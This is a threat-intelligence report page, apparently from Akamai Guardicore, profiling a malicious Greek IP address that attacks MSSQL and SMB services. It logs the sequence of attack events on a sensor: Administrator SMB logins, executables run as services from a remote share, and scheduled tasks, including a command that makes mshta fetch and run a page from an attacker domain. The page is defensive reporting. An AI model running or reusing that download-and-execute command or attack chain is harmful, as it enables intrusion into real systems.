IP Address: 79.129.107.213Malicious
IP Address: 79.129.107.213Malicious
This IP address attempted an attack on a machine in our threat sensors network
Role |
Attacker, Scanner |
Services Targeted |
MSSQL SMB |
Tags |
Successful SMB Login Service Configuration MSSQL Driver Start Service Stop SMB Service Start Driver Creation Driver Configuration Service Creation File Operation By CMD Execute from Share SMB Share Connect Listening Scheduled Task Creation Access Suspicious Domain Download File System File Modification Executable File Modification CMD SMB Null Session Login Service Deletion DNS Query Access Share |
Associated Attack Servers |
IP Address |
79.129.107.213 |
|
Domain |
- |
|
ISP |
OTEnet S.A. |
|
Country |
Greece |
|
WHOIS |
Created Date |
- |
Updated Date |
- |
|
Organization |
- |
First seen in Akamai Guardicore Segmentation |
2020-02-22 |
Last seen in Akamai Guardicore Segmentation |
2024-06-25 |
What is Akamai Guardicore SegmentationAkamai Guardicore Segmentation is a data center and cloud security solution that protects the organization's core assets, using flexible, quickly deployed and easy to understand micro-segmentation controls. Akamai Guardicore Segmentation generates in-context security incidents, with details on attacker tools and techniques, that help IR teams prioritize incident investigation and reduce dwell time. Learn More
A user logged in using SMB with the following username: Administrator - Authentication policy: Correct Password |
Successful SMB Login |
C:\ALXYjnkU.exe was downloaded |
Download File |
alxyjnku.exe was executed from the remote share \\server-backup\c$ |
Execute from Share |
c:\windows\system32\services.exe installed and started \\server-backup\c$\alxyjnku.exe as a service named xtWz under service group None |
Service Creation Service Start |
Service xtWz was stopped |
Service Stop |
c:\windows\system32\services.exe installed and started cmd as a service named iQAl under service group None |
Service Creation Service Start |
c:\windows\system32\services.exe installed and started cmd as a service named TJOF under service group None |
Service Creation Service Start |
A user logged in using SMB with the following username: Administrator - Authentication policy: Previously Approved User 4 times |
Successful SMB Login |
C:\xhIlVVhh.exe was downloaded |
Download File |
c:\windows\system32\services.exe installed and started system32\drivers\tcpip6.sys as a service named Tcpip6 under service group None |
Service Creation Driver Start |
c:\windows\system32\services.exe installed and started \\server-backup\c$\xhilvvhh.exe as a service named GETy under service group None |
Service Creation Service Start |
xhilvvhh.exe was executed from the remote share \\server-backup\c$ |
Execute from Share |
System file C:\WINDOWS\security\Database\secedit.sdb was modified |
System File Modification |
c:\windows\system32\services.exe installed and started %systemroot%\system32\6to4svc.dll as a service named 6to4 under service group NetworkService |
Service Creation Service Start |
c:\windows\system32\services.exe installed and started system32\drivers\smb.sys as a service named Smb under service group None |
Service Creation Driver Start |
c:\windows\system32\services.exe installed system32\drivers\tunmp.sys as a service named tunmp under service group None |
Service Creation |
C:\VqzPBkQo.exe was downloaded |
Download File |
c:\windows\system32\services.exe installed and started \\server-backup\c$\vqzpbkqo.exe as a service named nPPK under service group None |
Service Creation Service Start |
vqzpbkqo.exe was executed from the remote share \\server-backup\c$ |
Execute from Share |
Process netsvcs Service Group attempted to access suspicious domains: _LDAP._TCP |
Access Suspicious Domain DNS Query |
nrshcagp.exe was executed from the remote share \\server-backup\c$ |
Execute from Share |
c:\windows\system32\services.exe installed and started \\server-backup\c$\nrshcagp.exe as a service named WJvc under service group None |
Service Creation Service Start |
Executable file \\SERVER-BACKUP\C$\VqzPBkQo.exe was modified |
Executable File Modification |
Process NetworkService Service Group started listening on ports: 65531, 65532 and 65533 |
Listening |
Service WJvc was stopped |
Service Stop |
The command line C:\WINDOWS\system32\cmd.exe /c mshta http://w.beahh.com/page.html?pSERVER-BACKUP was scheduled to run by modifying C:\WINDOWS\Tasks\Autocheck.job |
|
C:\pwCpulNG.exe was downloaded |
Download File |
The command line c:\windows\gAEneai.exe was scheduled to run by modifying C:\WINDOWS\Tasks\taXMV.job |
|
c:\windows\system32\services.exe installed and started \\server-backup\c$\pwcpulng.exe as a service named rqbN under service group None |
Service Creation Service Start |
The command line c:\windows\temp\installed.exe was scheduled to run by modifying C:\WINDOWS\Tasks\Autoload.job |
|
pwcpulng.exe was executed from the remote share \\server-backup\c$ |
Execute from Share |
Process c:\windows\system32\mshta.exe attempted to access suspicious domains: w.beahh.com |
Access Suspicious Domain DNS Query |
Service rqbN was stopped |
Service Stop |
Service nPPK was stopped |
Service Stop |
Connection was closed due to timeout |
|
C:\AAORXOdL.exe |
SHA256: 3c2fe308c0a563e06263bbacf793bbe9b2259d795fcc36b953793a7e499e7f71 |
56320 bytes |